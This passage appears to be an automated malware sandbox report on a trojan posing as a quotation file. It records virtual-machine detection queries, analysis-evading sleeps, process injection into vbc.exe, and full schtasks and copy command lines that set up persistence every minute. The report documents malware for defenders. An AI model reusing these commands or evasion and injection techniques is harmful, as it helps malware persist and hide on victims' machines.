Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Users\user\Desktop\QUOTATION062022.exe TID: 6356	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5660	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe TID: 7064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6880	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 6880	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Registry key enumerated: More than 298 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 3998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 5494	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 2684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 6326	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vbc.exe, 00000017.00000003.475169463.000000000A96F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000017.00000003.475169463.000000000A96F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMZX6W1BN!
Source: vbc.exe, 00000017.00000003.474849036.00000000056D5000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.483489857.00000000056D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
Source: vbc.exe, 00000017.00000002.490764381.000000000A970000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78>
Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareSN1ZF_SBWin32_VideoController59WPYUURVideoController120060621000000.000000-00093755109display.infMSBDA_BSL2EWVPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMZX6W1BN
Source: vbc.exe, 00000004.00000002.378025847.0000000005687000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION062022.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5308008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41A000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 41C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 53C3008	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f

Source: C:\Users\user\Desktop\QUOTATION062022.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION062022.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION062022.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Queries volume information: C:\Users\user\AppData\Roaming\Data\Data.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Data\Data.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
